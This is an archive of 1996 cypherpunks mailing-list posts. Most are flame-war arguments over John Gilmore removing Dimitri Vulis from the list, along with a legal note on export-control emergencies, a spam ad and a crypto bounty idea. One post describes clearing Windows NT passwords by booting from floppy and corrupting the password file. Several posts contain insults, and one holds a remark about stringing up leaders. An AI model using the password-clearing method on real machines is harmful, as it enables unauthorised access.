have made about what they will reveal and what they will keep private.  They
are the ones who have to live with the consequences.  They are the ones who
should make the decisions.  For you to say that people should have "nothing to
hide" is awfully facile.  If you had admitted in your book to be a pedophile
or a white supremacist, coming out of the closet as a demonstration of your
faith in the values of openness, that would at least indicate that you had
experienced that of which you had written.  But of course even that would not
give you the right to presume to tell others to follow the same course.  In my
opinion.

Furthermore, there is a long tradition of anonymity and pseudonymity in
literature.  Probably the most prominent examples are the Federalist Papers,
published anonymously due to fear of political retribution.  The whole area of
politically-inspired anonymity is another counter-example to this notion that
people only want privacy for evil purposes.  How can you look back at the
history of even this country, which probably has one of the best records in
the world, and feel confident that no one will ever be wiser to express an
unpopular view anonymously?  Even if you feel safe about it in the U.S., your
suggestions would have world-wide impact. There are many countries in the
world where criticizing the government will have to be done anonymously if it
is done at all.

This raises the point that anonymity may promote criticism.  You go to some
lengths to praise the value of critical commentary as a route to the truth.
Yet in real life political considerations are one of the most potent blocks to
criticism, and these often apply most strongly to those who are in the best
position to criticize.  It is only through anonymity that much of the most
useful criticism can arise.  This is why we have our "whistle-blower" laws,
anonymous informants, etc.  Yes, anonymity can be easily misused in this
regard.  Information supplied anonymously needs to be carefully verified
before it can be relied on.  But I don't see the value in stripping the shield
of anonymity from people who would like to expose some injustice but are
afraid of the personal consequences.

===

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 16 Nov 1996 23:24:15 -0800 (PST)
To: "George A. Stathis" <hyperlex@hol.gr>
Subject: Re: Does John Gilmore...
In-Reply-To: <199611170408.CAA08642@prometheus.hol.gr>
Message-ID: <Pine.SUN.3.91.961116230248.26747B-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 17 Nov 1996, George A. Stathis wrote:

> What worries me is that people still subscribe to the
> cypherpunks list after this assault on free speech takes place.

So I guess we won't be seeing George around here any more (or 
did he just me OTHER people should unsubscribe?).

> ...I would gladly write articles on Dimitri's expulsion and the
> facade of Free Speech in mailing lists etc.,...But since I have
> no time, it's likely someone else will report this.

What was that from Thomas Paine about summer soldiers and
sunshine patriots?  Three cheers for George and his commitment
to "Free Speech."  I know I'm impressed.
 

 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 16 Nov 1996 20:59:54 -0800 (PST)
To: hallam@vesuvius.ai.mit.edu
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <9611151718.AA02034@vesuvius.ai.mit.edu>
Message-ID: <199611170516.XAA02653@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> >It's also the third largest political party in the country.

> Also untrue, the Reform party is a considerably more significant 
> force. 

     Third Largest != third most significant force. Most people who 
vote Perot are either Repubs or Democrats, not "Reform Party" members. 

     In the 2000 election, were there are no incumbents, Perot's numers
will be about the same as the Libertarians, and if Perot doesn't make 
the ballot (either death or too sick) the reform party won't even be 
on the map.

     Perot doesn't have that many supporters, just more people who 
have heard of him, so when they get to the Voting Booth, they looked 
an Clinton and almost threw up, then looked at Dole, but couldn't 
get their hand to their nose, so they punched the next name they
recognized. Perot.  


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 16 Nov 1996 21:01:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ??????????????????????
In-Reply-To: <199611151729.JAA17912@mailmasher.com>
Message-ID: <199611170518.XAA02663@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> you did not intend rudeness.
> 
> Santa's Little Helper
  ^^^^^
     You missspelled Satan...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CaShaky@aol.com
Date: Sat, 16 Nov 1996 20:21:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: opinions on www.accutrade.com security?
Message-ID: <961116232020_227622933@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Do any of you security knowledgeable people have any information on the
security of accutrade? I opened an account with them prior to subscribing
<sp? lol> to this list. I am now considering closing said account because of
what i have learned from this list. How easy or hard would it be for a hacker
to diddle with the accounts? To access the accounts all you need is a 9 digit
account number and a 4 digit pin number. But from what I have gleaned from
here is that the real leak in security is in attacking the OS directly.

If this post is inappropriate to this list I apoligize in advance, but i have
come to the conclusion that there are very bright and knowledgeable people on
this list (once you filter out the noise) and would appreciate your opinions.

Thank you
CaShaky






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sat, 16 Nov 1996 20:27:27 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: A word on "emergencies" [WAS Re: Final Solution to the Crypto ]
In-Reply-To: <1.5.4.32.19961117011708.007245d0@pop.pipeline.com>
Message-ID: <Pine.SUN.3.95.961116230726.5675C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I would like to dampen a little of the panic and FUD that seems to be
breeding on the question of the "national emergency" declared to keep the
bulk of the Export Administration Act regulations in effect after the
statute itself lapsed by its own terms.  [Note, by the way, that the EAA
rules are the *mild* ones.  The *tough* ones are still in force and are
not going away ... kill the EAA rules, and they start reclassifying
everything back to the Military List?]

Whether you like it or not, Congress has delegated to the President
sweeping authority to declare "national emergencies" due to foreign
threats.  In wartime the authority is very extensive; in peacetime almost
as great.  The authority is found in the "International Economic Emergency
Powers Act" (IEEPA).  While the President's determination that an
"emergency" exists is not reviewable, actions taken under IEEPA authority
*are* reviewable, indeed more reviewable than acts taken under the export
control laws. Of course since the delegation of power is broad, it's often
hard to win.

There have been LOTS of Presidential declaration of "emergencies" under
IEEPA and its predecessor statutes (e.g.the "trading with the enemy act",
which still applies in wartime).  Indeed, there are fewer today than
before Congress attempted to reform the system and required most of the
large number of emergencies in force to cease.  For example, every time
the President orders an embargo, e.g. against Iran, the statute requires
that he first declare an "emergency".

My point is not that Congress was wise to give the President this power. 
That's debatable; it's even more debatable that the intent was for it to
be quite as broad as the courts have found it to be (see e.g. Harold Koh's
book, The National Security Constitution, for more info). 

And, the point is not that Presidents are using this power in a wise or
measured way.  It's obvious that they are not.   At any given time
since WWI, many many (too many) "national emergencies" have been in force.

And, the point is especially not that this President was wise to declare
an emergency on these facts (although in his defense, several previous
presidents did exactly the same thing when previous editions of the EAA
lapsed; it seems to be something of a tradition...). 

Rather, my point is a simple one.  The fact that the President has
declared an emergency here is primarily a technical legal event.  It is
not a sign that martial law is about to be declared, that they are coming
to take you or your [fill in blank] away, or that anything fundamental has
changed.  Multi-year emergencies in which the executive uses one statute
to compensate for the Congressional decision/failure to pass another
statute is not, I submit, a particularly telling sign of a mature and
healthy democracy.  But this goes to large and gradual processes, not to
anything that suddenly happened. 

Again, for some background on all this, written before the Nov. 15
anouncements, see 
http://www.law.miami.edu/~froomkin/articles/planet_clipper.htm#POSTSCRIPT

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506(fax) 
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 13:46:24 -0800 (PST)
To: snow <hyperlex@hol.gr (George A. Stathis)
Subject: Re: The TRILATERAL COMMISSION -was: [REBUTTAL] Censorship on...
Message-ID: <199611170144.XAA29610@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 ðì 16/11/1996 -0600, snow wrote:
>> As regards the "gullibility", it's plainly dangerous; And cultivated
>> by the Media, apparently stronger in the U.S. than in many other places.
>> (written by E. Francis, on the "Trilateral Commission", and distributed
>>  to all members of his own -private- mailing list, of which I'm a part).
>> >THE LAND OF SHADOWS
>> >
>> >     Early this month is the last presidential=20
>> >"election" before the year 2000. As of this writing and=20
>> >long before, the election was decided in favor of Bill=20
>> >Clinton. It works out astrologically, but the real=20
>              ^^^^^^^^^^^^^^^^^^^^^^^^^         
>    I think this just about says it all.

A ha ha ha!!!  ROTFL.

You forget that Astrology is... unsuitable for gullible children. :-)



>    Go talk to Don Wood. 

Don't know who the hell Don Wood is.  However, I bet you 
_also_ don't know who Mr. Stringas is. Well, he is the author
of several books about his experience as a prominent C.I.A. official
working for the Trilateral Commission, a former NATO official who
acted as a "link" between the Athens government and Washington, and
he also (at the age of 70+) doesn't give a damn about anyone putting
a bullet in his head (or so he says) which is unlikely anyway since
it would be too "obvious".

Mr. Stringas is not the only one who wrote thousands of pages about
the Trilateral Commission's activities and members (e.g. Clinton).

However, you seem to dismiss well-known facts for the simple reason
that they were originally posted by an astrologer (E. Francis) and
apparently you believe astrologers are by nature non-credible.

That's fine with me. As a highly analytical Virgo with Venus in
Libra, I understand you very well.  :-)

I will reply with a real life JOKE, in this case:

Two days ago I had a rather official meeting with some nice people
with whom we negotiated a contract (of details irrelevant here).
Carrying my notebook computer (as I always do) with several astrology
programs inside it, I actually took it out and made a horoscope for
my... lawyer, who ALSO happens to be a Virgo with Venus in Libra, and
this was hilarious, since we _now_ understood our... similarities.

Then a gentleman came into the room who remarked that Astrology is
only suitable for loonies and gullible morons. He added that for
these people, the Greek word "zodion" applies except without the
'd' and the 'i' in the 3rd and 4rth places inside the word 'zodion'
('Zodion' means 'Zodiac sign'). (If you delete those characters,
you are left with the word 'Zoon' which means 'animal').

An astrologer friend of mine, also in the same room, immediately
replied: Aha! But the way you phrased it, Sir, makes you surely a
virgo, too; probably with a Virgo ascendant, I would say.

The guy stared at us in terror. He WAS a Virgo, and had a Virgo
ascendant, as he himself said.

He promptly stopped talking and looked rather thoughtful...

Perhaps a... coincidence? :-)

Have fun (with astrology).
George










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 16 Nov 1996 21:36:42 -0800 (PST)
To: azur@netcom.com (Steve Schear)
Subject: Re: ideal secure personal computer system
In-Reply-To: <v02140b01aeb3002591ab@[10.0.2.15]>
Message-ID: <199611170553.XAA02749@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> >A friend of mine just got back from a kerberos conferance at MIT, at
> >dinner one night they were talking about fun-n-easy ways to extract
> I discussed this seriously with an engineering acquaintence who has done
> drive design for a number of major companies.  He thought this could be
> easily achieved technically but might present some significant hurdles for
> getting UL approval :-)  Seriously though, there might be a market for an
> Mission Impossible drive retrofit kits which could be triggered by SW or
> HW.

     Well, how about this: spaced between each platter is 2 small files,
when the destroy is iniated, they simple dust off the platters. 

     Problem: 
     Power has to be on, 
     solution: don't turn the machine off unless you have to.   
               small (just enough to spin the drives up) battery in the
               drive case. 

     This shouldn't have too much trouble getting by the U.L.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lone_Wolf <gt6511a@cad.gatech.edu>
Date: Sat, 16 Nov 1996 20:58:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: NT insecurity
In-Reply-To: <19961117020255750.AAA212@rn234.io-online.com>
Message-ID: <199611170457.XAA20573@gypsy.cad.gatech.edu>
MIME-Version: 1.0
Content-Type: text


# 
# On Sat, 16 Nov 1996 17:00:56 -0500 (EST), Michael H. Warfield wrote:
# 
# >	Hooo  Hummm...  Another one...
# 
# >> Given the recent comments about insecure machines, I thought it was
# >> interesting to note that you can clear *every* password on an NT box by using
# >> a diskeditor to corrupt the password file (Boot off of a floppy and use
# >> NTFSDOS if you have to).  It'll reboot several times and then you'll be
# >> allowed to login.
# 
# >	Much as I absolutely detest NT, lets reitterate what everyone else
# >on this list has already heard too TOO many times...  If you have physical
# >access to the machine, it ain't secure.  It doesn't matter what operating
# 
# True.  However, as has been reiterated many times, NT is being marketed as a
# secure platform.  Unix people tend to know that you need to work to secure
# it.  MS hype might lead some of the non-cypherpunk admin types to believe
# it's secure.  Trust me. I hear from these people all the time!

As do I.  In fact, in a decision made prior to my joining my current employer,
the IS manager actually advocated security by obscurity, believing that NT was
so new that nobody would know the security flaws in it.  So our firewall is
an NT platform with a commercial firewall product on it.  Which limits our
functionality (we call up for support saying "this is what we want to do", and
they say "Oh, our Unix version will do that, but not our NT version".  Not to
mention, it's pretty bad when your firewall crashes out from under (leaving no
access, instead of open access, but it STILl interferes with getting work
done, especially since 90% of my work involves a remote site on the other side
of the firewall).

James
# 
# #  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
# #  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
# "That's our advantage at Microsoft; we set the standards and we can change them."
#    --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)
# 
# 
# 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raymond Mereniuk <raymond@advcable.com>
Date: Sun, 17 Nov 1996 01:07:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News-Reply
Message-ID: <s28e64b6.071@zed.ca>
MIME-Version: 1.0
Content-Type: text/plain


>>> aga <aga@dhp.com>  11/16/96, 02:26am >>>
On Fri, 15 Nov 1996, Bill Frantz wrote:

>Yes it WAS!!  He censored the mode and manner of the speaker.
>He censored the personal attacks and the rants and the racial
>diatribes!  And that SUCKS!  Gilmore was a fucking asshole for
>doing it!  And Gilmore is the WORST kind of censor that there
>can be, one who censors a person's "style."
>-aga.admin
>InterNet Freedom Council

You state that Mr. Gilmore censored someone but yet I still see that
someone's messages being propagated by `cypherpunks@toad.com'.  If Mr
Gilmore was really trying to censor someone he sure did a bad job of
it and can be criticzed for that much as I still see mail from the
censored party.  

Have you every lived, or been involved, in a society where
censorship, or local distortion, of facts was the norm??  Do you have
any idea how the powers that be discredit any voice in which they
don't like the message (or even the tone) and the lengths they go to
ensure the offical line is only one which is presented in a
reasonable form??  Have you ever been arrested and interrogated by
the local anti-corruption police because you made too much money and
dealt with a company where one particular person was known to accept
brides so therefore you must be corrupt??  So far no big deal, a
simple misunderstanding - but the anti-corruption police know how you
live your life and since you work long hours you must be cooking the
books.  

There is censorship in this society but it is so not so blatant and
is probably more dependent on what the established media choses to
report or not report.  Mr. Gilmore only made it slightly more
difficult for one particular player, who was misbehaving badly, to be
heard but did not totally remove that player's ability to be heard.  

If you are truly concerned about censorship you should be more
concerned about how the current administration's polices in regards
to cryptography will affect your future freedoms to communicate in a
manner in which is completely private and will subject you to no
government review of the subject matter discussed.  


Virtually

Raymond@advcable.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 14:09:11 -0800 (PST)
To: rent_control@msn.com (Stephen Boursy)
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <199611170206.AAA01013@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain




At 05:24 ðì 16/11/1996 -0500, Tim Scanlon wrote:

>Between
>the 2 lists & various people I see represented here, with all due &
>serious respect, you folks have GOT to have better, more important,
>and far more deserving issues to devote your time to. I would hope
>that you would take a few moments and think about those things, and
>consider acting appropriatly in light of those thoughts.
[...]
>And it's
>gotten way, way out of hand. I suggest that it might be better not
>to spam cypherpunks with this stuff, and to give it a rest.

>Tim Scanlon

I think the expulsion of Dimitri Vulis is HIGHLY on-topic inside the
Freedom Knights List.

As it happens, it is ALSO on topic in the cypherpunks list, no matter
how HARD you try to forget this.

After censoring Dimitri, you will also NATURALLY try to censor others
too, such as myself (receiving notices that I stop "cross-posting" to
the cypherpunks list).

However, you are a HYPOCRITICAL ASSHOLE, becayse you ALSO cross-post
to your own (cypherpynks) list. What you CLEARLY want is to HAVE
THE "LAST WORD" ABOUT THIS ISSUE.

This is typical of all censorship. If your request was SINCERE, you
would be the FIRST to NOT CROSS-POST IT to the cypherpunks list.

Oh Gods of Olympus!  :-)




>Stephen Boursy wrote, along with a horde of others with no lives:
>[lots of worthless crap snipped out]

You mean whatever you disagree with, or perhaps don't bother to read,
you dismiss as 'worthless crap'.

It's funny, this attitude. I find it philosophically inexcusable.
I never dismiss the opinions of others as "worthless crap" when they
are expressed eloquently. What I said instead is that "VERY important
ideas have been expressed from all sides". Perhaps you didn't notice.






 
>> When a list gets as big as that, it it no longer to be considered
>> a "mailing-list" but it is a _public_ forum.  The whole problem
>> here is the abuse of power by both the EFF and John Gilmore.
>> 
>It's not an abuse of power. It was an effort to curtail inappropriate
>SPAM. Much like this entire topic has become non-crypto SPAM on the
>cypherpunks list. 

You have begun REDEFINING "SPAM" according to your personal feelings
and opinions. "SPAM" as EVERYONE ELSE understands it, implies some kind
of _gain_ (e.g. from advertising) inside a posting.

Redefining "SPAM" is consistent with attempts to redefine other known
words as well. Like the word "Censorship", which has been redefined
to mean "ONLY official censorship".

The tendency of closed-minded internet communities to REDEFINE common
words as they deem fit, is RATHER WELL KNOWN, where I come from.

I am a dictionary maker by profession, BTW. (I write some of the
software for it, and run the business. OK, I also do spelling mistakes.
It's not my job to know everything, ya know! :-) :-) )


However, if you take my own opinions for instance, they are expressed
without ANY thought of gain (by definition impossible, since I don't
advertise anything. I write these texts at the intervals of a very
real life, involving a lot of swimming, and a lot of Research. When
my friends and I meet, we laugh a lot with the situation thousands
of miles across the ocean, where... EVEN a "cypherpunks" mailing list
has evicted someone forcibly. Rather typical, as it happens. Gives
you people a bad name you know...








>> The first time is the time when you lose all credibility, and there
>> is never any forgiveness for a plug-puller.
>
>All bullshit aside, this whole thing has NOTHING to do with crypto.
>And it has very VERY little to do with censorship either.

Which means you probably didn't read much of what was said anyway.
Typical...



George







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 16 Nov 1996 21:51:16 -0800 (PST)
To: tfs@adsl-122.cais.com (Tim Scanlon)
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <9611161024.AA00954@adsl-122.cais.com>
Message-ID: <199611170607.AAA02836@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Stephen Boursy wrote, along with a horde of others with no lives:
> [lots of worthless crap snipped out]
> > None of that analogy is applicable to the cyberpunks list.
> > When a list gets as big as that, it it no longer to be considered
> > a "mailing-list" but it is a _public_ forum.  The whole problem
> > here is the abuse of power by both the EFF and John Gilmore.

    Boursy is a twit who has lost more accounts that Vulis.

    Ignore him.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 14:25:27 -0800 (PST)
To: rent_control@msn.com (Stephen Boursy)
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <199611170223.AAA02024@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 05:24 ðì 16/11/1996 -0500, Tim Scanlon wrote:
>Stephen Boursy wrote, along with a horde of others with no lives:
>[lots of worthless crap snipped out]

As an aside, some of this "worthless crap" written by Stephen Boursy
and "others with no lives", happens to contain jewels of wisdom and
humility such as the following:

(cut and pasted from another posting):

>> P.S.  I never understood the (American?) preoccupation about... "putting
>>       out flames". If I find flame-messages boring, I don't read them!
>>       If anyone insults me, I reply; If anyone speaks nicely, I also do.
>>       The (American?) preoccupation about flames conceals a deep _fear_
>>       of freedom, freedom of the other person's freedom.
>
>
>   This is very true.  I'm worried about the US--our lack of respect
>for free speech--our extremely poor social services for the poor, etc.
>It is not a country I'm proud of at the moment.  Much of what is 
>praised about the US--our stability of government--is our downfall--we
>should be able to toss a government like we have out on its ass and 
>string up the leaders on telephone polls.


Are you aware... tiny Tim, that Stephen Boursy's comment should make
Americans feel PROUD, and that his response to my rant made me think
a LOT?

Perhaps learning from the humility and wisdom of others has also
been banned inside your... tiny-Tim brain cells.

Happy Recovery
Geirge





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ReplyOnly@ByMail.com
Date: Sat, 16 Nov 1996 23:54:51 -0800 (PST)
To: FullDatabase@outmail.com
Subject: ~~~ F.Y.I. ~~~
Message-ID: <199611170730.AAA05037@bud.indirect.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Friend,

The Only Internet Book you will ever Need....

So you're on the Internet, but don't know what to do,
where to go, or how to do it. This EXCITING 175 page,
14 chapter, E-Book will cover everything from the
World Wide Web, Veronica, IRC Clients, Gopher, Telnet,
Advanced Email, and how to set up your own electronic
store front.  Whether you're a veteran on the net or
have just begun, there is something to LEARN from
"Your Personal Guide to the Internet". The Internet is
growing daily and it is quickly becoming the wave of
the future.

Have you ever wondered what people are talking about
when they mention FTP or client-server protocol? Has
it made you feel left out when you didn't understand
their lingo? Everyone knows that KNOWLEDGE is POWER,
so why not learn more and take advantage of it?
Picture this.  You buy a beautiful boat, and you go
to take it out on the lake.  You get there, you can
start the boat, but can't get it to go anywhere.  That
is how many people are on the Internet.  They have the
software and the ability to go online, but don't know
what to do with it.  This is where "Your Personal Guide
to the Internet" comes in.  Just as a boat manual  would
have been useful to allow you to go on your trip, this
guide will allow you to do just about ANYTHING that you
can imagine on the Internet.

So, how much will this knowledge cost you? Simply, $4.00!
That's right, FOUR DOLLARS.  Why are we selling it for a such
a LOW PRICE?  We feel that everyone who is online should
be able to use the Internet to their full capabilities.
Why go to the bookstore and spend $50 to $100 on Internet
books, when you can get everything you need for $4.00?
This is a MUST HAVE!  Do not pass up this
OPPORTUNITY!  This is a LIMITED OFFER.

**** If you order within 10 days, As a  SPECIAL BONUS, you
will also receive "1000 Places to Advertise for Free"!

**** ORDER FORM (print this out and mail it along with your
cash, check or money order):


Name ______________________________

Address ____________________________

City _______________________________

State_______________________________

Zip Code ____________________________

Phone Number (if sending check) ______________________

Email Address ________________________@_______________________

Would you like this on diskette ($7.00 includes S & H)
or emailed to you for only $4.00? (circle one)

Make All Checks Payable To: Creative Financial Alternatives

Send check or money order to:

Creative Financial Alternatives
14837 Detroit Ave. 
Suite 135
Cleveland, OH  44107


***Orders will be shipped within 48 hours upon receipt.***

***Please Note:  All checks are held for 5 business days..































***Due to the Overwhelming demand Please Don't Reply Back
   By E-Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sun, 17 Nov 1996 00:53:41 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Another apologist for John Gilmore's censorship
Message-ID: <01BBD421.F6C167A0@king1-28.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Dr.Dimitri Vulis KOTM

dv:     Why the quotes? John Gilmore censored me with no quotes.

bw:   Don't worry about it.

dv:   No. John Gilmore's actions are contrary to free speech, but his own
principles clearly don't include free speech. He has no credibility.

bw:   I guess you think this will bring me anguish.

dv:    Not true. An honorable person would tolerate all speech and either ignore
it or respond with more speech. A dishonorable person, such as John Gilmore,
seeks to silence the speech he doesn't like.

bw:   You're not obliged to be dishonorable even if others are.

dv:    .....Note also that he hasn't pulled the plugs of other very rude people, like Timmy May (fart).

bw:   He's not obliged to be rude only according to your preference.

dv:    Speech is not action. Action is not speech.

bw:   But the principle regarding the tolerance of insults is the same in both cases.

dv:   I don't think John Gilmore's sexual practices are *that* bizarre. The Kinsey
report estimates that 10% of the population shares his practices.

bw:   I guess you think you're talking to someone who gives a flip.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 16 Nov 1996 23:08:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Crypto Bounties: Another Thought that crossed my mind.
Message-ID: <199611170725.BAA03182@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



Here we go again:

      There are is a lot of software that we would all like to see
developed and deployed right? 

      There are a lot of people out there who write code, sometimes 
even freely redistributable code, but they have to eat, and get their
net access right? 

     Well, I was thinking, what if a "Crypto Software Bounty Server"
were set up, so that someone could propose a tool that they would like 
to see, along with an initial bounty. Others could contribute toward that
bounty (anonymously if they wish) until either the tool was delivered.

     The original issuer sets standards for the software (i.e. "easy to
use interface to mixmaster remailers for Macintosh", then must define
easy to use; Software considered delivered when in [alpha beta late-beta 
&etc.]). The first to present software meeting these qualifications gets 
the bounty, with the caviate that the software must be either gnu-copylefted,
or some similar "free use" copyright, after all, "The Net" paid for it...

     Some of the problems (and potential solutions) I can think of in this:

     1) Refusing to honor the contract--Maybe when a project is proposed,
        some other people (for a small percentage of the total) sign on
        as judges. When they feel that it reached the stated goal, then
        it is done. -Or- Money put up is non-refundable, and the bounty
        stays in the "bank" until claimed. 

     2) If the money stays in the bank until claimed, people might not 
        put up that much (or enough) to make a specific project worthwile--
      
        This could be solved by allowing the "bounty" to lapse in one 
        of 3 ways:

        A) <x> length of time after the initial proposal (bad because 
           i) someone could already be working on it; ii) bad because
           other people might add to the bounty, so a potential programmer
           might not start until the "pot" has grown to a certain level.

        B) <x> length of time after the last addition to the bounty,
           bad for both i & ii above. 

           These can both be gotten around (and other problems) by allowing
           programmers to "register" with the service that they are working 
           on a project (either anonymous registery, so that people will 
           still contribute to the project, or list those registered so 
           that people know [if who] someone is working on it)

     3) Funding: The server (in both the machine and the organizational sense)
        could be funded by:
 
        A) Interest on the money accumulated.
 
        B) A percentage of the bounty (say 10%) 

        C) Both A & B.  
  
Has anything like this been proposed before? I know that the FSF (IIRC) accepts
contributions, but I am thinking of something more targeted, more "market 
driven" if you will. 

This could be expanded to non-crypto software as well, just think, if half 
the X Window users ponied up $5 a peice for a "good, easy to use non-motif
word processor", how long do you think it would take for someone to start 
coding a MS Word killer? 
 
Comments?


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Sun, 17 Nov 1996 01:49:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The persistance of reputation
In-Reply-To: <199611161644.FAA08442@mycroft.actrix.gen.nz>
Message-ID: <328EDFBE.2EC9@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> Paul Foley wrote:
> > On Fri, 15 Nov 1996 18:23:17 -0800, Dale Thorn wrote:
> >    A disinformer posing as an idiot.  Go figure.
> > Nice sig...and here I was thinking you were a real idiot.
> 
> I'll refrain from saying anything nasty here, since there is no info
> in this posting to comment on, i.e., I don't know who you are.
> 
> However, when you decide to CC cypherpunks with a flame like you just
> did, you could show *them* some consideration by leaving in some of
> the material so they know what the hell you're talking about.

That would be redundant. Everyone on cypherpunks receives what you send 
to the list, and thus has access to the source material, if desired. 
Paul's humor was surely appreciated by the people who have killfiled you 
and thus miss your posts unless there's a followup.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 16:09:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Does John Gilmore...
Message-ID: <199611170408.CAA08642@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 06:00 ìì 16/11/1996 EST, Dr.Dimitri Vulis KOTM wrote:
>Rich Burroughs <richieb@teleport.com> writes:
>> >I have a suggestion for "Aga" and others who believe this sort of
>> >nonsense.  Please do us all a favor and try to sue John.  I'm sure
>> >that among all jack-leg and wannabe lawyers on this list that they
>> >can come up with a viable cause of action.  And John has deep
>> >pockets; you could (literally) make out like bandits AND rescue
>> >"freedom of speech" on privately maintained mailing lists.
>>
>> Such a case would obviously fail.  John has the right to ban anyone he
>> wants from a list that he is hosting.
>
>Sure he does - I've been saying all along that John Gilmore has the right to
>act dishonorably, which he exercises. Yet the censorship supporters keep
>attributing to me the diametrically opposite view - that the state can force
>John to carry even the opinions he disagrees with. This is not what I've been
>saying, of course. John Gilmore lied when he attributed this opinion to me (as
>quoted by Declan McCulough). Only his honor could force him to do that, but he
>has no honor and no credibility. John had the right to exercise censorship on
>his private mailing list, which is precisely what he did.
>
>> I do question, though, whether or not it was the best way to handle the
>> situation.  As I have argued, the availability of end-user filtering made
>> banning Dimitri from the list unnecessary, IMHO.  And the list owner giving
>> people the boot sure doesn't fit with the picture I have had of what
>> cypherpunks was about.  YMMV.
>
>Same here - I used to have respect for John Gilmore, but now I don't.


Neither do I, or my friends who heard about it.

What worries me is that people still subscribe to the cypherpunks list
after this assault on free speech takes place.

If pimps like Gilmore ever succeed in controlling people in the Net,
it will be because of people accepting to become prostituted.

I am not a petty nationalist, but where I come from, after such an
expulsion a lot of people would unsubscribe, and the issue would appear
in the daily newspapers (several pages of which every week are devoted
to Internet news and activities).

Pity I'm too busy nowadays (in dictionary software production). I would
gladly write articles on Dimitri's expulsion and the facade of Free
Speech in mailing lists etc., as I occasionally have written articles
as a part-time journalist.

Believe me, the nature of the (cypherpunks) list as well as the
importance of the person expelled (at one time I wanted to interview
Dimitri for other things he exposed), makes VERY HOT NEWS indeed.

But since I have no time, it's likely someone else will report this.
